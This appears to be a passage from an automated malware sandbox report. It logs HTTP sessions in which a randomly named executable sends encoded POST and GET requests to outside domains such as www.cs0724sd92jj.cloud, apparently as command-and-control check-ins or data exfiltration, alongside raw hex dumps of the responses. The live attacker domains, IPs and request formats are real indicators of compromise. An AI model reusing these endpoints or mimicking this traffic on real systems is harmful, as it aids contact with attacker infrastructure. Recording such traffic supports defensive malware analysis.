4d eb 58 fd e8 fa f9 0b e7 [TRUNCATED]
                                        Data Ascii: e2fZmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskktf8[:^_mh#%%F.(fQvbIKZoH{&.YFMX.[?fqyv^zcVJIy4JHPad%WAPvT,<6,F#mSQd4V~gma+|\|j-"RAqnj4T={\DL$x7 ;TJ}mj3h,8[J~xA!hv3y?YdnabJpAS[^#9603t~D31Js8(`6Ul?a>g)u-="3]cJH?fiEZ@lTy\wi{60Pv:0Q%Y#Nh=eK$o(U#@eg.k9KAl:d$:+A&Xt^#N|%$7E|?C`uXTTJX3R<Z5.$?NN&eoRH.j;W2l?EUM| [TRUNCATED]
                                        Aug 27, 2024 08:42:26.760334969 CEST1236INData Raw: b6 4f 67 9d 98 bf 40 aa ae 31 80 1f 3b 5e cb 55 1b 91 a1 7d 1a 13 46 81 ef 75 9f 6e 14 30 30 e0 6e 53 00 fb 17 d0 8b 68 05 f5 3e 8e ef 01 67 3c c2 14 bf ce 3a ae 56 4e 38 6a 6b 93 e7 92 b4 7d 30 dd 00 f1 d1 53 18 f7 cf 88 7a f7 93 2f e1 22 8f 93
                                        Data Ascii: Og@1;^U}Fun00nSh>g<:VN8jk}0Sz/"DNwuxLjjP2J'zev$/PB[$Pzi(wA#`a1%wtZD7(.kLYyZdB&-@
                                        Aug 27, 2024 08:42:26.760345936 CEST448INData Raw: 44 a6 fb 4f 22 4c e6 39 d0 95 8e c0 22 4f 41 53 70 71 c2 bd 18 8a d9 ee 9b 53 57 10 1e 05 74 4a 01 8a c9 2b 92 65 4e 08 38 1b 2e 1c 4a a0 39 52 61 f0 f8 23 70 e7 a7 1c e8 b1 9b 65 98 43 9e a3 22 fe 86 bb 01 ce 3a cb 00 6d d7 b0 43 ce b7 d0 94 3a
                                        Data Ascii: DO"L9"OASpqSWtJ+eN8.J9Ra#peC":mC:|bmr_.@>2=8@"9?ce#`O l:#48Kt>c8,`OKWpy62^="?*7(F>P8wV:_?2
                                        Aug 27, 2024 08:42:26.760359049 CEST897INData Raw: 0d 3c 50 a8 94 a9 5d b9 ba 7e e2 f2 44 42 3d a0 89 7b 70 74 2f 67 a7 4d a9 d3 e4 61 8a 7d d8 c2 a0 2d 7d 41 d4 22 d8 af a6 9f e7 df 6d 05 b8 ff 61 c5 bc 2e a3 9e 49 df fc 41 a5 0a 45 95 97 f0 9c c1 6d e3 4d 40 43 fb 56 c1 26 a9 34 32 1c 7b 24 cf
                                        Data Ascii: <P]~DB={pt/gMa}-}A"ma.IAEmM@CV&42{$DN{VsJA,_5Mjyldd*.--v)$iM=(2#o\wM "]Sl<MDgEpu}|8ML\gZ+k'3M^]q1yYR
                                        Aug 27, 2024 08:42:26.760370970 CEST897INData Raw: 0d 3c 50 a8 94 a9 5d b9 ba 7e e2 f2 44 42 3d a0 89 7b 70 74 2f 67 a7 4d a9 d3 e4 61 8a 7d d8 c2 a0 2d 7d 41 d4 22 d8 af a6 9f e7 df 6d 05 b8 ff 61 c5 bc 2e a3 9e 49 df fc 41 a5 0a 45 95 97 f0 9c c1 6d e3 4d 40 43 fb 56 c1 26 a9 34 32 1c 7b 24 cf
                                        Data Ascii: <P]~DB={pt/gMa}-}A"ma.IAEmM@CV&42{$DN{VsJA,_5Mjyldd*.--v)$iM=(2#o\wM "]Sl<MDgEpu}|8ML\gZ+k'3M^]q1yYR


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        8192.168.2.651204194.58.112.174805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:42:28.576951981 CEST583OUTGET /mjy7/?AT=RrjDj4Z85jYPlHG0&mvjDMBx8=cg99eHdIhH6PRmBvzzsY4n38eZmBksl3PUY+KkgGmlThXL3WC2dP6WW67TtKoTiLnNtMIhIq0So6UKQjTmNbIq3Et/8UbAXoANeZC4OXTx0MozCDv0bkromw6gd6nEy8FhxsXmw= HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.indeks.space
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Aug 27, 2024 08:42:29.260879040 CEST1236INHTTP/1.1 404 Not Found
                                        Server: nginx
                                        Date: Tue, 27 Aug 2024 06:42:29 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Data Raw: 32 39 33 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 69 6e 64 65 6b 73 2e 73 70 61 63 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 [TRUNCATED]
                                        Data Ascii: 293d<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.indeks.space</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://reg.ru" [TRUNCATED]
                                        Aug 27, 2024 08:42:29.260895014 CEST224INData Raw: 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61 67 65 5f 5f 63 6f 6e
                                        Data Ascii: iv class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.indeks.space</h1><p class="b-
                                        Aug 27, 2024 08:42:29.260910034 CEST1236INData Raw: 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 64 65 73 63 72 69 70 74 69 6f 6e 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d1 80 d0 b8 d1 80 d0 be d0 b2 d0 b0 d0 bd 3c 62 72 3e d0
                                        Data Ascii: parking__header-description b-text"> <br>&nbsp; &nbsp;.</p><div class="b-parking__buttons-wrapper"><a class="b-button b-button_color_reference b-button_size_normal b-p
                                        Aug 27, 2024 08:42:29.260921955 CEST1236INData Raw: 74 79 70 65 5f 68 6f 73 74 69 6e 67 22 3e 3c 2f 73 70 61 6e 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 2d 6d 61 72 67 69 6e 5f 6c 65 66 74 2d 6c 61 72 67 65 22 3e 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 62 2d 74 69 74 6c 65 20 62 2d 74 69 74
                                        Data Ascii: type_hosting"></span><div class="l-margin_left-large"><strong class="b-title b-title_size_large-compact"></strong><p class="b-text b-parking__promo-subtitle l-margin_bottom-none"> &nbsp;</p></div><
                                        Aug 27, 2024 08:42:29.260931969 CEST448INData Raw: 75 2f 68 6f 73 74 69 6e 67 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 77 77 77 2e 69 6e 64 65 6b 73 2e 73 70 61 63 65 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 70 61 72 6b 69 6e 67 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 73 5f 6c 61 6e 64 5f 68 6f 73 74
                                        Data Ascii: u/hosting/?utm_source=www.indeks.space&utm_medium=parking&utm_campaign=s_land_host&amp;reg_source=parking_auto"> </a><p class="b-price b-parking__price"> <b class="b-price__amount">83&nbsp;<span class="char-roub
                                        Aug 27, 2024 08:42:29.260945082 CEST1236INData Raw: 5f 73 69 7a 65 5f 6c 61 72 67 65 2d 63 6f 6d 70 61 63 74 22 3e d0 92 d0 b8 d1 80 d1 82 d1 83 d0 b0 d0 bb d1 8c d0 bd d1 8b d0 b9 20 d1 85 d0 be d1 81 d1 82 d0 b8 d0 bd d0 b3 2c 20 56 50 53 20 d0 b8 26 6e 62 73 70 3b 44 65 64 69 63 61 74 65 64 3c
                                        Data Ascii: _size_large-compact"> , VPS &nbsp;Dedicated</strong><p class="b-text b-parking__promo-description"> &nbsp;
                                        Aug 27, 2024 08:42:29.260955095 CEST1236INData Raw: 73 2e 73 70 61 63 65 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 70 61 72 6b 69 6e 67 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 73 5f 6c 61 6e 64 5f 63 6d 73 26 61 6d 70 3b 72 65 67 5f 73 6f 75 72 63 65 3d 70 61 72 6b 69 6e 67 5f 61 75 74 6f 22 3e d0 97
                                        Data Ascii: s.space&utm_medium=parking&utm_campaign=s_land_cms&amp;reg_source=parking_auto"></a></div><div class="b-parking__promo-item b-parking__promo-item_type_sitebuilder"><strong class="b-title b-title_size_large-compact">
                                        Aug 27, 2024 08:42:29.260966063 CEST1236INData Raw: 63 74 20 62 2d 62 75 74 74 6f 6e 5f 74 65 78 74 2d 73 69 7a 65 5f 6e 6f 72 6d 61 6c 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 62 75 74 74 6f 6e 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 62 75 74 74 6f 6e 5f 74 79 70 65 5f 73 73 6c 22 20 68 72 65 66 3d 22 68
                                        Data Ascii: ct b-button_text-size_normal b-parking__button b-parking__button_type_ssl" href="https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-sertifikat?utm_source=www.indeks.space&utm_medium=parking&utm_
                                        Aug 27, 2024 08:42:29.260977030 CEST1236INData Raw: 20 28 20 76 61 72 20 69 20 3d 20 30 3b 20 69 20 3c 20 6c 69 6e 6b 73 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 6c 69 6e 6b 73 5b 20 69 20 5d 2e 68 72 65 66 2e 69 6e
                                        Data Ascii: ( var i = 0; i < links.length; i++) { if ( links[ i ].href.indexOf('?') >= 0 ) { links[ i ].href = links[ i ].href + '&'; } else { links[ i ].href = links
                                        Aug 27, 2024 08:42:29.260992050 CEST328INData Raw: 65 20 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 66 6f 72 20 28 20 76 61 72 20 69 20 3d 20 30 3b 20 69 20 3c 20 73 70 61 6e 73 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28
                                        Data Ascii: e ); } for ( var i = 0; i < spans.length; i++) { if ( spans[ i ].className.match( /^puny/ ) ) { var text = spans[ i ][ t ]; text = punycode.ToUnicode( text ); spans[
                                        Aug 27, 2024 08:42:29.261394978 CEST1068INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 70 61 6e 73 5b 20 69 20 5d 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 20 27 6e 6f 6e 65 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 3c
                                        Data Ascii: spans[ i ].style.display = 'none'; } } }</script>... Global site tag (gtag.js) - Google Analytics --><script async src="https://www.googletagmanager.com/gtag/js?id=UA-3380909-25"></script><script>windo


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        9192.168.2.651205119.28.49.194805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:42:35.134093046 CEST849OUTPOST /dk4s/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.cs0724sd92jj.cloud
                                        Origin: http://www.cs0724sd92jj.cloud
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 213
                                        Referer: http://www.cs0724sd92jj.cloud/dk4s/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Raw: 6d 76 6a 44 4d 42 78 38 3d 36 6a 58 47 35 56 78 58 50 6b 56 61 65 50 6f 61 55 2f 56 73 37 43 70 6e 4c 57 73 4f 4b 47 4a 6d 44 4e 5a 46 56 6e 43 36 38 4c 6c 64 66 6c 38 33 70 52 55 78 52 62 78 71 6d 77 71 73 6d 35 42 4b 50 6d 45 61 4f 50 30 2f 44 6d 55 41 61 73 74 6e 4e 4d 74 55 41 41 36 31 4c 41 75 53 42 7a 2b 61 2b 74 56 52 4d 64 34 48 31 4a 70 4b 66 44 74 54 4c 47 70 31 6e 64 50 37 76 4c 67 4c 70 67 74 6a 67 62 6a 36 47 78 6f 34 44 59 32 6e 67 73 67 58 36 73 6d 79 39 30 6f 76 35 76 6f 72 43 74 54 6b 62 36 6a 65 73 79 42 61 2f 32 43 56 44 4a 69 66 46 44 36 4c 4d 4d 47 79 6a 53 47 45 50 6f 42 70 35 44 67 6d 47 2f 6f 39 78 51 55 58
                                        Data Ascii: mvjDMBx8=6jXG5VxXPkVaePoaU/Vs7CpnLWsOKGJmDNZFVnC68Lldfl83pRUxRbxqmwqsm5BKPmEaOP0/DmUAastnNMtUAA61LAuSBz+a+tVRMd4H1JpKfDtTLGp1ndP7vLgLpgtjgbj6Gxo4DY2ngsgX6smy90ov5vorCtTkb6jesyBa/2CVDJifFD6LMMGyjSGEPoBp5DgmG/o9xQUX
                                        Aug 27, 2024 08:42:36.018942118 CEST406INHTTP/1.1 301 Moved Permanently
                                        Server: nginx
                                        Date: Tue, 27 Aug 2024 06:42:35 GMT
                                        Content-Type: text/html
                                        Content-Length: 162
                                        Connection: close
                                        Location: https://www.cs0724sd92jj.cloud/dk4s/
                                        Strict-Transport-Security: max-age=31536000
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        10192.168.2.651206119.28.49.194805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:42:37.708352089 CEST873OUTPOST /dk4s/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.cs0724sd92jj.cloud
                                        Origin: http://www.cs0724sd92jj.cloud
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 237
                                        Referer: http://www.cs0724sd92jj.cloud/dk4s/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Raw: 6d 76 6a 44 4d 42 78 38 3d 36 6a 58 47 35 56 78 58 50 6b 56 61 63 75 59 61 58 63 4e 73 7a 43 70 34 58 6d 73 4f 45 6d 4a 69 44 4e 56 46 56 6b 4f 71 2f 34 42 64 63 45 4d 33 6f 55 34 78 57 62 78 71 75 51 71 6a 69 35 42 4e 50 6d 34 6f 4f 4b 55 2f 44 6d 41 41 61 73 39 6e 4e 62 42 58 42 51 36 4e 47 67 75 63 4f 54 2b 61 2b 74 56 52 4d 64 73 74 31 4a 68 4b 66 54 39 54 4b 6a 46 32 71 39 50 34 73 4c 67 4c 74 67 73 71 67 62 6a 45 47 30 78 76 44 61 2b 6e 67 74 51 58 36 66 2b 78 6b 6b 6f 74 30 50 70 48 43 4f 79 4d 52 64 43 61 72 41 73 33 2f 32 44 7a 43 2f 6a 46 5a 77 36 6f 65 63 6d 77 6a 51 65 32 50 49 42 44 37 44 59 6d 55 6f 6b 61 2b 6b 78 30 41 2f 43 43 51 4f 51 58 68 44 2f 61 33 6f 67 33 54 70 6f 4d 6b 51 3d 3d
                                        Data Ascii: mvjDMBx8=6jXG5VxXPkVacuYaXcNszCp4XmsOEmJiDNVFVkOq/4BdcEM3oU4xWbxquQqji5BNPm4oOKU/DmAAas9nNbBXBQ6NGgucOT+a+tVRMdst1JhKfT9TKjF2q9P4sLgLtgsqgbjEG0xvDa+ngtQX6f+xkkot0PpHCOyMRdCarAs3/2DzC/jFZw6oecmwjQe2PIBD7DYmUoka+kx0A/CCQOQXhD/a3og3TpoMkQ==
                                        Aug 27, 2024 08:42:38.569730997 CEST406INHTTP/1.1 301 Moved Permanently
                                        Server: nginx
                                        Date: Tue, 27 Aug 2024 06:42:38 GMT
                                        Content-Type: text/html
                                        Content-Length: 162
                                        Connection: close
                                        Location: https://www.cs0724sd92jj.cloud/dk4s/
                                        Strict-Transport-Security: max-age=31536000
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        11192.168.2.651207119.28.49.194805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:42:40.252702951 CEST1886OUTPOST /dk4s/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.cs0724sd92jj.cloud
                                        Origin: http://www.cs0724sd92jj.cloud
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 1249
                                        Referer: http://www.cs0724sd92jj.cloud/dk4s/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Raw: 6d 76 6a 44 4d 42 78 38 3d 36 6a 58 47 35 56 78 58 50 6b 56 61 63 75 59 61 58 63 4e 73 7a 43 70 34 58 6d 73 4f 45 6d 4a 69 44 4e 56 46 56 6b 4f 71 2f 34 4a 64 63 32 30 33 70 33 67 78 58 62 78 71 6b 77 71 7a 69 35 41 52 50 6d 51 57 4f 4b 51 46 44 6c 34 41 63 2f 6c 6e 61 65 31 58 59 67 36 4e 50 41 75 52 42 7a 2b 44 2b 74 45 59 4d 64 38 74 31 4a 68 4b 66 52 56 54 44 57 70 32 73 39 50 37 76 4c 67 66 70 67 73 43 67 66 32 38 47 30 45 53 44 71 65 6e 68 4e 41 58 70 63 61 78 37 30 6f 72 33 50 70 66 43 4f 2b 54 52 63 71 38 72 41 31 73 2f 78 44 7a 41 6f 75 36 64 55 4f 34 4c 76 36 33 79 42 57 42 43 76 46 43 68 31 59 74 5a 4f 73 76 32 58 64 42 42 37 57 63 56 34 74 46 33 51 4f 32 32 2b 39 66 66 4e 70 64 31 75 4e 58 4c 6b 39 31 68 63 31 5a 58 47 74 6d 6f 69 65 6d 48 45 6e 61 30 2b 32 2b 6c 6a 43 69 36 59 45 2b 52 59 76 38 47 6c 31 30 4f 50 4b 57 4b 52 4c 6b 53 38 54 77 48 49 36 4a 56 5a 46 72 45 34 74 34 61 6e 6f 78 6e 51 4c 56 69 63 65 42 67 50 46 52 56 67 57 78 65 75 77 46 4a 46 41 2f 72 61 6b 6c 6e 71 69 6e 68 [TRUNCATED]
                                        Data Ascii: mvjDMBx8=6jXG5VxXPkVacuYaXcNszCp4XmsOEmJiDNVFVkOq/4Jdc203p3gxXbxqkwqzi5ARPmQWOKQFDl4Ac/lnae1XYg6NPAuRBz+D+tEYMd8t1JhKfRVTDWp2s9P7vLgfpgsCgf28G0ESDqenhNAXpcax70or3PpfCO+TRcq8rA1s/xDzAou6dUO4Lv63yBWBCvFCh1YtZOsv2XdBB7WcV4tF3QO22+9ffNpd1uNXLk91hc1ZXGtmoiemHEna0+2+ljCi6YE+RYv8Gl10OPKWKRLkS8TwHI6JVZFrE4t4anoxnQLViceBgPFRVgWxeuwFJFA/raklnqinh/UH4uhthzqJrwVHKgfFuD584gXWrMIaID0Vd+08dctEiQWJW5mYEhiUAu+3oPoFJHycUqR7o8QDHvFUIOnthEdIhQW7grbmqsALeKAqly6UL/wunfXjlWx8fGDwTv9atIRP7prcc6zv/eA/JdBfLimJy6S1evjFtTp+bKupFmk2pTXMzD/9xjigpQJtL+1DgvkImDAdI0LzKaZEwsl3qHeel9I5R2TgXHWvg8i2csISmSrKhbbcBbmgmWJMkmai5OGADIBgYLKSPxuHMpu8dgXRdktljfipAIGnPUpH8DLcNNeC9IfzrJxQplYkFKA3jozmszMjJ1fckizfy0X8yXP5xMc1e3G3zyjpj3m78vwfhvcwZGubZAiQPrRUwYTz4gEnHJHGHp+6B7PTLCvI4bq/h+HSOm/3j0/5txFG8DIaDdGBSyuCLAdeDNvlZoxKtGjV+DIB9Nbi2t5B/4u83ML05v8w3op6lKRkRa99jGojCdetJDRIJUu0NMeIMPCBDec2wiK1U1AkIy+g43wP9ojZQqRtCI/GCbAQw1G0vdExr7nI4iN1uXYXjokQUeLZolzwtURlbUWJwFxKJHqtXRIK7RRiV6+AXl8DoxRK3Ec6GhyD1vMZNJoOlii5iM6EmhqqPpkzODbokorEWkemRfN0OS+ze+ryy3w [TRUNCATED]
                                        Aug 27, 2024 08:42:41.157800913 CEST406INHTTP/1.1 301 Moved Permanently
                                        Server: nginx
                                        Date: Tue, 27 Aug 2024 06:42:40 GMT
                                        Content-Type: text/html
                                        Content-Length: 162
                                        Connection: close
                                        Location: https://www.cs0724sd92jj.cloud/dk4s/
                                        Strict-Transport-Security: max-age=31536000
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        12192.168.2.651208119.28.49.194805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:42:42.794981003 CEST589OUTGET /dk4s/?mvjDMBx8=3h/m6gEkIEYHXtcNJZ5C3CADcygHFzVsLbB7LXK+s4FKSFcfshdIf9ZYkD73wqhGP2I3Lsc8IXkGColEMvp7YUHZOAuQGwzpl+pcDPhm8cR3ChF/e3R/pt7cs4gBzisZlZ7cEhY=&AT=RrjDj4Z85jYPlHG0 HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.cs0724sd92jj.cloud
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Aug 27, 2024 08:42:43.687777996 CEST572INHTTP/1.1 301 Moved Permanently
                                        Server: nginx
                                        Date: Tue, 27 Aug 2024 06:42:43 GMT
                                        Content-Type: text/html
                                        Content-Length: 162
                                        Connection: close
                                        Location: https://www.cs0724sd92jj.cloud/dk4s/?mvjDMBx8=3h/m6gEkIEYHXtcNJZ5C3CADcygHFzVsLbB7LXK+s4FKSFcfshdIf9ZYkD73wqhGP2I3Lsc8IXkGColEMvp7YUHZOAuQGwzpl+pcDPhm8cR3ChF/e3R/pt7cs4gBzisZlZ7cEhY=&AT=RrjDj4Z85jYPlHG0
                                        Strict-Transport-Security: max-age=31536000
